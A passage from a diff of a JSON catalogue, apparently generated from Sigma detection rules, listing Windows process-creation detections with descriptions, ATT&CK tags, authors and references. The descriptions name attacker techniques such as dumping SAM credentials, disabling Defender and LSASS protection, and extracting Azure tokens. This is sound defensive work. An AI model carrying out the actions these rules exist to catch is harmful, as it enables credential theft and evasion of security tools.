"value": 
"Suspicious Redirection to Local Admin Share", + "meta": { + "refs": [ + "https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/", + "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_redirect_local_admin_share.yml" + ], + "tags": "No established tags", + "creation_date": "2022/01/16", + "filename": "proc_creation_win_redirect_local_admin_share.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the redirection of an alternate data stream (ADS) of / within a Windows command line session", + "uuid": "70e68156-6571-427b-a6e9-4476a173a9b6", + "value": "Cmd Stream Redirection", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md#atomic-test-3---create-ads-command-prompt", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_redirect_to_stream.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.004" + ], + "creation_date": "2022/02/04", + "filename": "proc_creation_win_redirect_to_stream.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects actions caused by the RedMimicry Winnti playbook", + "uuid": "95022b85-ff2a-49fa-939a-d7b8f56eeb9b", + "value": "RedMimicry Winnti Playbook Execute", + "meta": { + "refs": [ + "https://redmimicry.com", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_redmimicry_winnti_proc.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1106", + 
"attack.t1059.003", + "attack.t1218.011" + ], + "creation_date": "2020/06/24", + "filename": "proc_creation_win_redmimicry_winnti_proc.yml", + "author": "Alexander Rausch", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the export of a crital Registry key to a file.", + "uuid": "82880171-b475-4201-b811-e9c826cd5eaa", + "value": "Exports Critical Registry Keys To a File", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", + "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_export_critical_keys.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1012" + ], + "creation_date": "2020/10/12", + "filename": "proc_creation_win_regedit_export_critical_keys.yml", + "author": "Oddvar Moe, Sander Wiebing, oscd.community", + "level": "high", + "falsepositive": [ + "Dumping hives for legitimate purpouse i.e. 
backup or forensic investigation" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the export of the target Registry key to a file.", + "uuid": "f0e53e89-8d22-46ea-9db5-9d4796ee2f8a", + "value": "Exports Registry Key To a File", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", + "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_export_keys.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1012" + ], + "creation_date": "2020/10/07", + "filename": "proc_creation_win_regedit_export_keys.yml", + "author": "Oddvar Moe, Sander Wiebing, oscd.community", + "level": "low", + "falsepositive": [ + "Legitimate export of keys" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the import of the specified file to the registry with regedit.exe.", + "uuid": "73bba97f-a82d-42ce-b315-9182e76c57b1", + "value": "Imports Registry Key From a File", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", + "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_import_keys.yml" + ], + "tags": [ + "attack.t1112", + "attack.defense_evasion" + ], + "creation_date": "2020/10/07", + "filename": "proc_creation_win_regedit_import_keys.yml", + "author": "Oddvar Moe, Sander Wiebing, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate import of keys", + "Evernote" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the import of a alternate datastream to the registry with regedit.exe.", + "uuid": "0b80ade5-6997-4b1d-99a1-71701778ea61", + "value": 
"Imports Registry Key From an ADS", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", + "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_import_keys_ads.yml" + ], + "tags": [ + "attack.t1112", + "attack.defense_evasion" + ], + "creation_date": "2020/10/12", + "filename": "proc_creation_win_regedit_import_keys_ads.yml", + "author": "Oddvar Moe, Sander Wiebing, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the execution of regini.exe which can be used to modify registry keys, the changes are imported from one or more text files.", + "uuid": "5f60740a-f57b-4e76-82a1-15b6ff2cb134", + "value": "Modifies the Registry From a File", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Regini/", + "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regini", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regini.yml" + ], + "tags": [ + "attack.t1112", + "attack.defense_evasion" + ], + "creation_date": "2020/10/08", + "filename": "proc_creation_win_regini.yml", + "author": "Eli Salem, Sander Wiebing, oscd.community", + "level": "low", + "falsepositive": [ + "Legitimate modification of keys" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the import of an alternate data stream with regini.exe, regini.exe can be used to modify registry keys.", + "uuid": "77946e79-97f1-45a2-84b4-f37b5c0d8682", + "value": "Modifies the Registry From a ADS", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Regini/", + 
"https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f",
+ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regini",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regini_ads.yml"
+ ],
+ "tags": [
+ "attack.t1112",
+ "attack.defense_evasion"
+ ],
+ "creation_date": "2020/10/12",
+ "filename": "proc_creation_win_regini_ads.yml",
+ "author": "Eli Salem, Sander Wiebing, oscd.community",
+ "level": "high",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects suspicious command line reg.exe tool adding key to RUN key in Registry",
+ "uuid": "de587dce-915e-4218-aac4-835ca6af6f70",
+ "value": "Reg Add RUN Key",
+ "meta": {
+ "refs": [
+ "https://app.any.run/tasks/9c0f37bc-867a-4314-b685-e101566766d7/",
+ "https://docs.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_add_run_key.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.t1547.001"
+ ],
+ "creation_date": "2021/06/28",
+ "filename": "proc_creation_win_reg_add_run_key.yml",
+ "author": "Florian Roth",
+ "level": "medium",
+ "falsepositive": [
+ "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons.",
+ "Legitimate administrator sets up autorun keys for legitimate reasons.",
+ "Discord"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects execution of \"reg.exe\" commands with the \"add\" or \"copy\" flags on safe boot registry keys. 
Often used by attacker to allow the ransomware to work in safe mode as some security products do not",
+ "uuid": "d7662ff6-9e97-4596-a61d-9839e32dee8d",
+ "value": "Add SafeBoot Keys Via Reg Utility",
+ "meta": {
+ "refs": [
+ "https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_add_safeboot.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1562.001"
+ ],
+ "creation_date": "2022/09/02",
+ "filename": "proc_creation_win_reg_add_safeboot.yml",
+ "author": "Nasreddine Bencherchali",
+ "level": "high",
+ "falsepositive": [
+ "Unlikely"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Qbot used reg.exe to add Defender folder exceptions for folders within AppData and ProgramData.",
+ "uuid": "48917adc-a28e-4f5d-b729-11e75da8941f",
+ "value": "Registry Defender Exclusions",
+ "meta": {
+ "refs": [
+ "https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/",
+ "https://redcanary.com/threat-detection-report/threats/qbot/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_defender_exclusion.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1562.001"
+ ],
+ "creation_date": "2022/02/13",
+ "filename": "proc_creation_win_reg_defender_exclusion.yml",
+ "author": "frack113",
+ "level": "medium",
+ "falsepositive": [
+ "Legitimate use"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects reg command lines that disable certain important features of Microsoft Defender",
+ "uuid": "452bce90-6fb0-43cc-97a5-affc283139b3",
+ "value": "Registry Defender Tampering",
+ "meta": {
+ "refs": [
+ "https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/",
+ "https://github.com/swagkarna/Defeat-Defender-V1.2.0",
+ 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_defender_tampering.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1562.001"
+ ],
+ "creation_date": "2022/03/22",
+ "filename": "proc_creation_win_reg_defender_tampering.yml",
+ "author": "Florian Roth",
+ "level": "high",
+ "falsepositive": [
+ "Rare legitimate use by administrators to test software (should always be investigated)"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on safe boot registry keys. Often used by attacker to prevent safeboot execution of security products",
+ "uuid": "fc0e89b5-adb0-43c1-b749-c12a10ec37de",
+ "value": "Delete SafeBoot Keys Via Reg Utility",
+ "meta": {
+ "refs": [
+ "https://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_delete_safeboot.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1562.001"
+ ],
+ "creation_date": "2022/08/08",
+ "filename": "proc_creation_win_reg_delete_safeboot.yml",
+ "author": "Nasreddine Bencherchali, Tim Shelton",
+ "level": "high",
+ "falsepositive": [
+ "Unlikely"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on services registry key. 
Often used by attacker to remove AV software services",
+ "uuid": "05b2aa93-1210-42c8-8d9a-2fcc13b284f5",
+ "value": "Delete Services Via Reg Utility",
+ "meta": {
+ "refs": [
+ "https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_delete_services.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1562.001"
+ ],
+ "creation_date": "2022/08/01",
+ "filename": "proc_creation_win_reg_delete_services.yml",
+ "author": "Nasreddine Bencherchali",
+ "level": "high",
+ "falsepositive": [
+ "Unlikely"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through Windows Registry where the SAM database is stored",
+ "uuid": "038cd51c-3ad8-41c5-ba8f-5d1c92f3cc1e",
+ "value": "Registry Dump of SAM Creds and Secrets",
+ "meta": {
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-1---registry-dump-of-sam-creds-and-secrets",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_dump_sam.yml"
+ ],
+ "tags": [
+ "attack.credential_access",
+ "attack.t1003.002"
+ ],
+ "creation_date": "2022/01/05",
+ "filename": "proc_creation_win_reg_dump_sam.yml",
+ "author": "frack113",
+ "level": "high",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects the execution of reg.exe and subsequent command line arguments for enabling RDP service on the host by tampering with the 'CurrentControlSet\\Control\\Terminal Server' subkeys",
+ "uuid": "0d5675be-bc88-4172-86d3-1e96a4476536",
+ "value": "Enabling RDP Service via Reg.exe",
+ "meta": {
+ "refs": [
+ "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_enable_rdp.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.lateral_movement",
+ "attack.t1021.001",
+ "attack.t1112"
+ ],
+ "creation_date": "2022/02/12",
+ "filename": "proc_creation_win_reg_enable_rdp.yml",
+ "author": "@Kostastsale, @TheDFIRReport, slightly modified by pH-T",
+ "level": "high",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects the import of the '.reg' files from suspicious paths using the 'reg.exe' utility",
+ "uuid": "62e0298b-e994-4189-bc87-bc699aa62d97",
+ "value": "Imports Registry Key From a File Using Reg.exe",
+ "meta": {
+ "refs": [
+ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/reg-import",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_import_from_suspicious_paths.yml"
+ ],
+ "tags": [
+ "attack.t1112",
+ "attack.defense_evasion"
+ ],
+ "creation_date": "2022/08/01",
+ "filename": "proc_creation_win_reg_import_from_suspicious_paths.yml",
+ "author": "frack113, Nasreddine Bencherchali",
+ "level": "medium",
+ "falsepositive": [
+ "Legitimate import of keys"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects reg command lines that disables PPL on the LSA process",
+ "uuid": "8c0eca51-0f88-4db2-9183-fdfb10c703f9",
+ "value": "Registry Disabling LSASS PPL",
+ "meta": {
+ "refs": [
+ "https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_lsass_ppl.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1562.010"
+ ],
+ 
"creation_date": "2022/03/22",
+ "filename": "proc_creation_win_reg_lsass_ppl.yml",
+ "author": "Florian Roth",
+ "level": "high",
+ "falsepositive": [
+ "Unlikely"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.\nAdversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start.\nWindows stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services\n",
+ "uuid": "9b0b7ac3-6223-47aa-a3fd-e8f211e637db",
+ "value": "Service ImagePath Change with Reg.exe",
+ "meta": {
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.011/T1574.011.md#atomic-test-2---service-imagepath-change-with-regexe",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_service_imagepath_change.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.t1574.011"
+ ],
+ "creation_date": "2021/12/30",
+ "filename": "proc_creation_win_reg_service_imagepath_change.yml",
+ "author": "frack113",
+ "level": "medium",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. 
This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination.",
+ "uuid": "8a3038e8-9c9d-46f8-b184-66234a160f6f",
+ "value": "Potential Remote Desktop Tunneling",
+ "meta": {
+ "refs": [
+ "https://www.elastic.co/guide/en/security/current/potential-remote-desktop-tunneling-detected.html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_desktop_tunneling.yml"
+ ],
+ "tags": [
+ "attack.lateral_movement",
+ "attack.t1021"
+ ],
+ "creation_date": "2022/09/27",
+ "filename": "proc_creation_win_remote_desktop_tunneling.yml",
+ "author": "Tim Rauch",
+ "level": "medium",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects the desktopimgdownldr utility being used to download a remote file. An adversary may use desktopimgdownldr to download arbitrary files as an alternative to certutil.",
+ "uuid": "214641c2-c579-4ecb-8427-0cf19df6842e",
+ "value": "Remote File Download via Desktopimgdownldr Utility",
+ "meta": {
+ "refs": [
+ "https://www.elastic.co/guide/en/security/current/remote-file-download-via-desktopimgdownldr-utility.html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_file_download_desktopimgdownldr.yml"
+ ],
+ "tags": [
+ "attack.command_and_control",
+ "attack.t1105"
+ ],
+ "creation_date": "2022/09/27",
+ "filename": "proc_creation_win_remote_file_download_desktopimgdownldr.yml",
+ "author": "Tim Rauch",
+ "level": "medium",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects remote PowerShell sections by monitoring for wsmprovhost (WinRM host process) as a parent or child process (sign of an active PowerShell remote session).",
+ "uuid": "734f8d9b-42b8-41b2-bcf5-abaf49d5a3c8",
+ 
"value": "Remote PowerShell Session Host Process (WinRM)",
+ "meta": {
+ "refs": [
+ "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190511223310.html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_powershell_session_process.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1059.001",
+ "attack.t1021.006"
+ ],
+ "creation_date": "2019/09/12",
+ "filename": "proc_creation_win_remote_powershell_session_process.yml",
+ "author": "Roberto Rodriguez @Cyb3rWard0g",
+ "level": "medium",
+ "falsepositive": [
+ "Legitimate usage of remote Powershell, e.g. for monitoring purposes."
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Identifies use of various commands to query a systems time. This technique may be used before executing a scheduled task or to discover the time zone of a target system.",
+ "uuid": "b243b280-65fe-48df-ba07-6ddea7646427",
+ "value": "Discovery of a System Time",
+ "meta": {
+ "refs": [
+ "https://eqllib.readthedocs.io/en/latest/analytics/fcdb99c2-ac3c-4bde-b664-4b336329bed2.html",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1124/T1124.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_time_discovery.yml"
+ ],
+ "tags": [
+ "attack.discovery",
+ "attack.t1124"
+ ],
+ "creation_date": "2019/10/24",
+ "filename": "proc_creation_win_remote_time_discovery.yml",
+ "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community",
+ "level": "low",
+ "falsepositive": [
+ "Legitimate use of the system utilities to discover system time for legitimate reason"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Adversaries may disable security tools to avoid possible detection of their tools and activities by removing Windows Defender Definition Files",
+ "uuid": "9719a8aa-401c-41af-8108-ced7ec9cd75c",
+ "value": "Remove Windows Defender Definition Files",
+ "meta": {
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md",
+ "https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remove_windows_defender_definition_files.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1562.001"
+ ],
+ "creation_date": "2021/07/07",
+ "filename": "proc_creation_win_remove_windows_defender_definition_files.yml",
+ "author": "frack113",
+ "level": "medium",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.",
+ "uuid": "36480ae1-a1cb-4eaa-a0d6-29801d7e9142",
+ "value": "Renamed Binary",
+ "meta": {
+ "refs": [
+ "https://attack.mitre.org/techniques/T1036/",
+ "https://mgreen27.github.io/posts/2019/05/12/BinaryRename.html",
+ "https://mgreen27.github.io/posts/2019/05/29/BinaryRename2.html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_binary.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1036.003"
+ ],
+ "creation_date": "2019/06/15",
+ "filename": 
"proc_creation_win_renamed_binary.yml",
+ "author": "Matthew Green - @mgreen27, Ecco, James Pemberton / @4A616D6573, oscd.community (improvements), Andreas Hunkeler (@Karneades)",
+ "level": "medium",
+ "falsepositive": [
+ "Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist",
+ "PsExec installed via Windows Store doesn't contain original filename field (False negative)"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.",
+ "uuid": "0ba1da6d-b6ce-4366-828c-18826c9de23e",
+ "value": "Highly Relevant Renamed Binary",
+ "meta": {
+ "refs": [
+ "https://attack.mitre.org/techniques/T1036/",
+ "https://mgreen27.github.io/posts/2019/05/12/BinaryRename.html",
+ "https://mgreen27.github.io/posts/2019/05/29/BinaryRename2.html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1036.003"
+ ],
+ "creation_date": "2019/06/15",
+ "filename": "proc_creation_win_renamed_binary_highly_relevant.yml",
+ "author": "Matthew Green - @mgreen27, Florian Roth",
+ "level": "high",
+ "falsepositive": [
+ "Custom applications use renamed binaries adding slight change to binary name. 
Typically this is easy to spot and add to whitelist"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects process creation with a renamed BrowserCore.exe (used to extract Azure tokens)",
+ "uuid": "8a4519e8-e64a-40b6-ae85-ba8ad2177559",
+ "value": "Process Creation with Renamed BrowserCore.exe",
+ "meta": {
+ "refs": [
+ "https://twitter.com/mariuszbit/status/1531631015139102720",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_browsercore.yml"
+ ],
+ "tags": [
+ "attack.t1528",
+ "attack.t1036.003"
+ ],
+ "creation_date": "2022/06/02",
+ "filename": "proc_creation_win_renamed_browsercore.yml",
+ "author": "Max Altgelt",
+ "level": "high",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects execution of renamed ftp.exe binary based on OriginalFileName field",
+ "uuid": "277a4393-446c-449a-b0ed-7fdc7795244c",
+ "value": "Renamed FTP.EXE Binary Execution",
+ "meta": {
+ "refs": [
+ "https://lolbas-project.github.io/lolbas/Binaries/Ftp/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_ftp.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1059",
+ "attack.defense_evasion",
+ "attack.t1202"
+ ],
+ "creation_date": "2020/10/09",
+ "filename": "proc_creation_win_renamed_ftp.yml",
+ "author": "Victor Sergeev, oscd.community",
+ "level": "medium",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects renamed jusched.exe used by cobalt group",
+ "uuid": "edd8a48c-1b9f-4ba1-83aa-490338cd1ccb",
+ "value": "Renamed jusched.exe",
+ "meta": {
+ "refs": [
+ 
"https://www.bitdefender.com/files/News/CaseStudies/study/262/Bitdefender-WhitePaper-An-APT-Blueprint-Gaining-New-Visibility-into-Financial-Threats-interactive.pdf",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_jusched.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.defense_evasion",
+ "attack.t1036.003"
+ ],
+ "creation_date": "2019/06/04",
+ "filename": "proc_creation_win_renamed_jusched.yml",
+ "author": "Markus Neis, Swisscom",
+ "level": "high",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects execution of a renamed version of the \"Mavinject\" process. Which can be abused to perform process injection using the \"/INJECTRUNNING\" flag",
+ "uuid": "e6474a1b-5390-49cd-ab41-8d88655f7394",
+ "value": "Rename Mavinject Execution",
+ "meta": {
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md",
+ "https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e",
+ "https://twitter.com/gN3mes1s/status/941315826107510784",
+ "https://reaqta.com/2017/12/mavinject-microsoft-injector/",
+ "https://twitter.com/Hexacorn/status/776122138063409152",
+ "https://github.com/SigmaHQ/sigma/issues/3742",
+ "https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_mavinject.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.privilege_escalation",
+ "attack.t1055.001",
+ "attack.t1218.013"
+ ],
+ "creation_date": "2022/12/05",
+ "filename": 
"proc_creation_win_renamed_mavinject.yml",
+ "author": "frack113, Florian Roth",
+ "level": "high",
+ "falsepositive": [
+ "Unlikely"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects the execution of a renamed meg.exe of MegaSync during incident response engagements associated with ransomware families like Nefilim, Sodinokibi, Pysa, and Conti.",
+ "uuid": "643bdcac-8b82-49f4-9fd9-25a90b929f3b",
+ "value": "Renamed MegaSync",
+ "meta": {
+ "refs": [
+ "https://redcanary.com/blog/rclone-mega-extortion/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_megasync.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1218"
+ ],
+ "creation_date": "2021/06/22",
+ "filename": "proc_creation_win_renamed_megasync.yml",
+ "author": "Sittikorn S",
+ "level": "high",
+ "falsepositive": [
+ "Software that illegaly integrates MegaSync in a renamed form",
+ "Administrators that have renamed MegaSync"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects process creation with a renamed Msdt.exe",
+ "uuid": "bd1c6866-65fc-44b2-be51-5588fcff82b9",
+ "value": "Renamed Msdt.exe",
+ "meta": {
+ "refs": [
+ "https://lolbas-project.github.io/lolbas/Binaries/Msdt/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_msdt.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1036.003"
+ ],
+ "creation_date": "2022/06/03",
+ "filename": "proc_creation_win_renamed_msdt.yml",
+ "author": "pH-T",
+ "level": "high",
+ "falsepositive": [
+ "Unlikely"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects execution of renamed client32.exe (NetSupport RAT) via Imphash, Product and OriginalFileName strings",
+ "uuid": "0afbd410-de03-4078-8491-f132303cb67d",
+ "value": 
"Execution of Renamed NetSupport RAT",
